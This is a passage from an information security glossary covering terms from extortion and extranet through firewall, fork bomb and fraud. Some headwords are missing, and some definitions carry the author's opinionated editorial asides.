The use of coercion (typically involving threats of cybertage, disclosure of confidential information or denial of service through ransomware, or physical harm) to obtain assets (generally money) from a target individual or organisation.


“Extension of an organisation's Intranet, especially over the public network infrastructure, enabling resource sharing between the organisation and other organisations and individuals that it deals with by providing limited access to its Intranet.  Note: For example, an organisation's customers can be provided access to some part of its Intranet, creating an extranet, but the customers cannot be considered ‘trusted’ from a security standpoint.” (ISO/IEC 27033-1).


A legal principle that potentially gives the authorities powers over foreigners outside their normal jurisdiction, for example prosecuting and penalizing non-European organisations for failing to comply with GDPR by protecting the privacy rights of EU citizens whose personal information they obtain.


Someone whose views or ideology are way out of line with the general population.  Between activist and terrorist on a notional threat scale.


Unauthorized transfer of information from the internal to external environments, typically using network connections and/or various covert channels or methods such as a dropCf. intrusion.


Site, installation, building, room etc“An area that facilitates government business.  For example, a facility can be a building, a floor of a building or a designated area on the floor of a building” (NZ information Security Manual).

Failover, fail-over

Manual or automated process for transferring resilient ICT services between redundant equipment, campuses and/or network routes, providing high availability, hopefully averting more serious incidents“The capability to switch over automatically (typically without human intervention or warning) to a redundant or standby information system upon the failure or abnormal termination of the previously active system” (CNSSI-4009).


Engineering concept used heavily in safety-critical or other high-security system and process designs whereby a control failure or adverse situation leaves the system/process in an inherently safe or secure – albeit perhaps only partially functional – state or condition.


Resilience arrangement.  See also load-shedding“Selective termination of affected nonessential processing when hardware or software failure is determined to be imminent” (CNSSI-4009).


Undesirable state for systems and processes that have not been explicitly designed to be safe and secure (i.efailsafe) under all conditions, and hence are ‘fragile’.  For example, an access control that fails spontaneously or is actively disabled or bypassed in an attack, may permit inappropriate access that it was supposed to have prevented or at least detected.  In the absence of compensating controls, security by obscurity can fail spectacularly if details of a supposedly obscure vulnerability are widely disclosed.

(Factor Analysis of
Information Risk)

Open Group’s structured risk analysis method examines various parameters (factors) to estimate the magnitude and probability of losses and hence risk.

Fair use

Copyright laws generally permit limited use of copyright materials without the intellectual property owner’s explicit permission.  Such fair use exemptions typically allow reproduction (such as quoting and summarizing) of non-substantial or inconsequential parts of copyright materials for limited research and educational purposes, or to create backup/archive copies.


Sometimes described as ‘blind trust’ or ‘wishful thinking’, faithful people believe in something without evidence of its validity and veracity, sometimes to the point of ignoring or flatly and irrationally denying credible evidence to the contrary.  Faith is not a control but a potentially harmful form of delusion, manipulation, coercion or social engineering.


Spoofed item that misrepresents the genuine article.  See also counterfeit.

Fake news

Propaganda in the form of fabricated ‘news’ stories circulated online through websites and social media, with the specific aim of misleading and influencing (coercing) the general population.  Fake news stories are also used as clickbait.


Use of robustness, resilience, redundancy and/or failover features in a system or process to continue to deliver limited critical services under emergency conditions when the primary mechanisms have been compromised in an incident.  A form of contingency planning.  See also failover.

False acceptance,
type I error

Authentication failure in which an impostor is incorrectly associated with someone else’s identityCf. false rejection.

False Acceptance Rate

Commonplace metric for a biometric system, measuring the proportion of authentications that exhibit type 1 errors“The measure of the likelihood that the biometric security system will incorrectly accept an access attempt by an unauthorized user.  A system’s false acceptance rate typically is stated as the ratio of the number of false acceptances divided by the number of identification attempts.” (CNSSI-4009).  See also False Rejection Rate.

False flag

An attempt to get an attack attributed to an innocent party, deflecting blame from the perpetrator while denigrating the accused.

False rejection,
type II error

Authentication failure in which the system denies or fails to confirm a person’s true identityCf. false acceptance.

False Rejection Rate

Commonplace metric for a biometric system, measuring the proportion of authentications that exhibit type II errors.  “The measure of the likelihood that the biometric security system will incorrectly reject an access attempt by an authorized user.  A system’s false rejection rate typically is stated as the ratio of the number of false rejections divided by the number of identification attempts.” (CNSSI-4009).  See also False Acceptance Rate.

False sense of security

Vulnerability involving an unwarranted and inappropriate faith in the security/control arrangements stemming from inadequate assurance and naïveté – for example, believing that antivirus software totally prevents malware incidents.

Fast-flux DNS,
fast-flux botnet

Black hat high-availability and concealment technique uses proxy servers or DNS changes to redirect botnet traffic (commands and/or data) dynamically to any of a set of distributed servers so that, even if individual servers in the set are shut down by the authorities, others remain reachable. 


Problem with information processing or communications systems including a security incident, complete or partial system failure (outage), program error/bug, virus, or some other generally unanticipated and undesirable mode of operation etc.

Fault tolerance

High-availability design goal that systems should survive faults and other incidents that would otherwise cause failures or unplanned outages.  A strong but highly specific form of resilience.

Fax machine

“A device that allows copies of documents to be sent over a telephone network” (NZ information Security Manual).

  No kidding!

(Federal Bureau of Investigation)

Spooky US government agency responsible for domestic intelligence and surveillance deliberately targeting US citizens.  Founded by J Edgar Hoover.  See also CIA and DHS.

(Federal Risk and Authorization Management Program)

US program imposing good practice security standards (principally NIST SP800-53) on the suppliers of cloud computing services for government use.

Femto cell,
home cell,
small cell

A cellphone repeater or base station providing cellular service in a limited local area, typically within a building, where the conventional cellular coverage is limited or non-existent.  “Small, low-power cellular base station.  Note: A femto cell is typically designed for use in a home or small businesses” (ISO/IEC 27033-6).

Fibre channel,
fiber channel

“Serial I/O interconnect capable of supporting multiple protocols, including access to open system storage, access to mainframe storage, and networking.  Note: Fibre Channel supports point to point, arbitrated loop, and switched topologies with a variety of copper and optical links running at speeds from 1 gigabit per second to over 10 gigabits per second” (ISO/IEC 27040).

Fibre channel interconnect

“Serial Small Computer System Interface (SCSI) transport protocol used on Fibre Channel interconnects” (ISO/IEC 27040).

Fidelity insurance,
fidelity bond

Insurance against the costs and losses to an organisation arising from incidents involving deliberate acts of disloyalty or dishonesty by its workers or agents (e.g. advisors and other service providers).


A responsibility based on trust and ethics, for example officers of an organisation are legally and morally required, obliged or bound to act in the best interests of the organisation’s owners and other stakeholders, even if doing so conflicts with their personal interests.  See also malfeasance, due care and fidelity insurance.

Fileless malware

Cloud-based malware that executes in RAM, exploiting apps and utilities such as web browsers, PowerShell and WMI supposedly without leaving behind distinctive files on an infected system’s disks.  Powersploit’s obfuscated PowerShell scripts, for instance, may not be detected reliably by antivirus packages and, even if they remain on the disk, may escape forensic analysis.  Malware may be located using registry entries and hidden inside other files or in obscure directories.

Filing system

Structured, systematic, organised and usually indexed or catalogued arrangement for information storage, search, retrieval and referencing.  “Any structured set of personal data which are accessible according to specific criteria, whether centralised, decentralised or dispersed on a functional or geographical basis” (GDPR).


“A device that controls the flow of data in accordance with a security policy” (NZ information Security Manual).


“Process of accepting or rejecting data flows through a network, according to specified criteria” (ISO/IEC 27033-1).


Literally, the print mark left behind on a surface by a finger, a biometric.  Often used figuratively to indicate characteristics that uniquely identify a person (e.g. using DNA profiling), system or data.  Despite theoretical claims as to their uniqueness, gathering and analysing any kind of fingerprint creates practical constraints on the scientific accuracy, hence there is a small but finite possibility that fingerprints from different individuals, systems or data may fail to be distinguished in practice.  Furthermore, being biometrics, confidentiality is a challenge for the owner and they cannot be changed if compromised.  See also hash.

FIPS 197 (Federal Information Processing Standard № 197)

Standard published by NIST in 2001 specifying AES.  See


Along with smoke, one of many physical security threats, whether caused by accident or intentionally (arson).  See also flood, intruder and malicious damage.


One of several nasty species of malware in the wild in 2018.  A browser hijacker and downloader.


Specialized network router specifically configured as a security gateway monitoring, controlling and filtering traffic between network segments, nodes and devices according to a set of access control rules“Type of security barrier placed between network environments -- consisting of a dedicated device or a composite of several components and techniques -- through which all traffic from one network environment traverses to another, and vice versa, and only authorized traffic, as defined by the local security policy, is allowed to pass” (ISO/IEC 27033-1).  A network protection device that filters incoming and outgoing network data, based on a series of rules” (NZ information Security Manual).

  See also packet filter, stateful firewall and deep packet inspection.


Software loaded into a memory chip or similar hardware device, normally embedded in hardware interfaces to control and communicate with specialist devices such as plant controllers, disk drives or network cards.  The BIOS on a computer motherboard is an example.  “Software embedded in a hardware device” (NZ information Security Manual).

(Foreign Intelligence Surveillance Act)

US law unilaterally permitting the US government to snoop on foreigners’ information for US intelligence, counterterrorism and (presumably) cyberwarfare, economic, political or other purposes.  Became law in 1978, amended in 2008.  Established the Foreign Intelligence Surveillance Court as a SECRET oversight body to mediate official access requests by the NSA, CIA, FBI or other agencies/authorities.

(Federal Information Security Management Act)

US law imposing information risk-based security and privacy obligations on government agencies and, to some extent, their suppliers.  “A statute (Title III, P.L. 107-347) that requires agencies to assess risk to information systems and provide information security protections commensurate with the risk.  FISMA also requires that agencies integrate information security into their capital planning and enterprise architecture processes, conduct annual information systems security reviews of all programs and systems, and report the results of those reviews to OMB.” (CNSSI-4009).

Five Eyes

A strategic alliance/collaboration between the governments of the USA, Canada, UK, Australia and New Zealand to share intelligence capabilities and information.  Evolved from the UKUSA bilateral ‘special arrangement’ that had in effect been in place since WWII or before.  Whereas the security agencies are not supposed to snoop on their own citizens, they can do so via their Five Eyes partners – a convenient means of bypassing the governance control.

Flash memory [media]

Data storage device using a silicon chip as the media, in a manner that retains the data indefinitely without consuming power, such as a USB memory stick.  “A specific type of EEPROM” (NZ information Security Manual).


A fundamental and inherent vulnerability, weakness or failing.  In the context of software security, flaws are generally errors in the system design or architecture that create or expose information security vulnerabilities.  Flaws in corporate governance, risk management, information security management, business continuity management etc. can result in an organisation’s abject failure to characterize and treat reasonably foreseeable (let alone unforeseeable) risks.


(a) A surprisingly common physical security threat.  Due to global warming, the number of natural disasters involving flooding has increased markedly in recent years, while leaking pipes, blocked sewers and sprinkler systems remain as prevalent as ever.  See also fire, intruder and malicious damage. (b) Accidentally overwhelm an IT system or network with a high volume of traffic, for example an abnormally high peak load on a heavily-promoted website or a tsunami of spurious packets generated by a hardware error on a network node. (c) Deliberately overwhelm an IT system or network with large volumes of generated traffic in an attempt to cause a denial of service or to slip a covert attack past failing security controls.

Fly lead

“A lead that connects IT equipment to the fixed infrastructure of the facility. For example, the lead that connects a workstation to a network wall socket” (NZ information Security Manual).


Fire suppressant or extinguishant chemical from DuPont popular in automated fire control systems.

(Failure Mode Effects Analysis)

Structured bottom-up engineering method, pioneered by NASA, to analyse potential reliability, safety or security risks or issues early in the system development lifecycle, identifying how the system might possibly fail (e.g. due to single points of failure).  Used to design more resilient, robust, secure and safe systems.

launch pad
stepping stone,
pivot point

The system initially compromised on a hacked network, from which further probes and attacks may be launched.  May be any vulnerable networked system, including things, multifunction devices, desktops, portables, servers etc.


Explicitly prohibit i.e. withhold consent, authorisation or permission for someone to do something, go somewhere etc. or face the consequences.

Forensic, forensics

Relating to the law courts.  See also digital forensics“The practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data” (CNSSI-4009).

Forensic copy

More than just a copy of an item of forensic evidence, a forensic copy has been produced by a specific, forensically-sound method that gives an extremely high level of assurance that the copy is an authentic and complete duplicate of the original – for example, a bitwise image of a computer disk, created using a particular set of forensic tools, with a cryptographic hash value identical to the original.

Forensic evidence

Evidence destined to be used in court.  The legal system imposes strict integrity requirements on evidence, requiring strong assurance measures such as a valid and unbroken chain of custody.


The fraudster who commits forgery.


Fraudulent counterfeiting of items such as negotiable instruments (e.g. banknotes),  credentials etc.

Fork bomb,

Malware that spawns one or more copies of itself and starts those copies running, thus exponentially increasing in number until it exhausts finite system resources and thus, generally, brings the entire system to a halt i.e. a denial of service attack.

Form grabber, grabber,
form jacking

Malware that captures data entered by the system user into online forms, particularly credentials used for authentication.

(Free Open Source Software)

Software source code that its owner deliberately publishes and permits or encourages others to use, change and ideally improve as a collaborative public effort.  ‘Free’ refers to liberty, not necessarily price: some FOSS suppliers, for example, provide additional chargeable services such as professional support and patching.

(For Official Use Only)

Deprecated US government label applied to unclassified information containing content that may have been exempt from mandatory disclosure under the Freedom of Information Act.  Replaced by CUI.


(a) Falsely yet credibly accuse someone of something untoward, such as a crime, or deflect the blame their way in such a way that they appear guilty whereas the guilty party appears innocent.  An integrity failure.  A form of social engineering.  (b) Permanent wooden or metal structure into which a door or window may be fixed by hinges, catches and locks.  The strength of the frame and its fixture to the surrounding wall are critical to the ability of the door or window to resist brute force attacks, fires, floods etc.  The entire structure, plus the associated processes (such as architecture and design, operation and maintenance), constitutes a physical security control system.


A conceptual or physical structure or skeleton linking related items together, providing a logical basis or foundation for further construction, understanding and use.   May involve models, blueprints, architecture and design specifications, nodes and linkages, systems (such as management systems), methods, approaches, standards, policies, guidelines etc.  May be theoretical or practical.  Information security frameworks typically concern governance, information risk, compliance, privacy and related matters, in whole or in part.

Fraud, con

Theft, misappropriation or similar crime involving deliberate deception or misrepresentation of the target by a fraudster, usually for unfair advantage or illegal gain.  Many forms of fraud are known e.g. assuming someone else’s name and masquerading as them (identity fraud); promising victims a large payout on receipt of an advance fee; causing victims unwittingly to call a premium-rate phone number and so rack-up a large bill (toll fraud); tricking victims into downloading malware or visiting unsavoury/undesirable websites (click bait); falsifying or inflating expenses claimed (expenses fraud); falsifying financial records (accounting or tax fraud); substituting bank account numbers (payment fraud).  See also scam.

Fraud recovery fraud

Follow-on fraud in which fraudsters typically claiming to be lawyers, barristers, police officers etc. promise to help victims of prior frauds recover their losses, prosecute the original fraudsters etc.  Fraud victims have, in effect, already demonstrated their naïveté, gullibility and susceptibility in the earlier incidents and may still be ignorant or in a psychological state of denial, hence being relatively vulnerable to subsequent frauds by selfish heartless exploitative low-life pond scum totally devoid of compassion.

con artist

Deceitful, deceptive person who commits or perpetrates fraud.  Sometimes incorrectly called ‘the fraud’ which, strictly speaking, is the incident not the perpetrator.

Freedom Of Information Act (FOIA)

Laws in many jurisdictions require public bodies to disclose potentially sensitive information under certain conditions, typically for public interest reasons, on request by a member of the public following the prescribed procedures.  When entire documents or data sets are to be disclosed under FOIA, it may be necessary to redact parts e.g. to safeguard ongoing covert operations and operatives (typically informers, moles and spies) or to protect privacy or national security.


Software that is legitimately and legally free of usage restrictions, typically as a result of having been released intentionally into the public domain by its owner.

Freezer spray